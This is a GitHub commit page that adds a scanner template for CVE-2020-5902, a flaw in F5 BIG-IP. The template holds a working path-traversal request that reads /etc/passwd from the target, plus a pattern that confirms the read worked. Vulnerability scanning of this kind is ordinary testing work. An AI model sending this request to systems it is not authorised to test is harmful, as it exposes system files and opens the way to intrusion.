Skip to content

Commit

Permalink
* v8.6 - Added CVE-2020-5902 F5 BIG-IP RCE sc0pe template
Browse files Browse the repository at this point in the history
  • Loading branch information
1N3 committed Jul 5, 2020
1 parent 7da2754 commit 527fb60
Showing 1 changed file with 9 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
METHOD='GET'
MATCH="root\:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

0 comments on commit 527fb60

Please sign in to comment.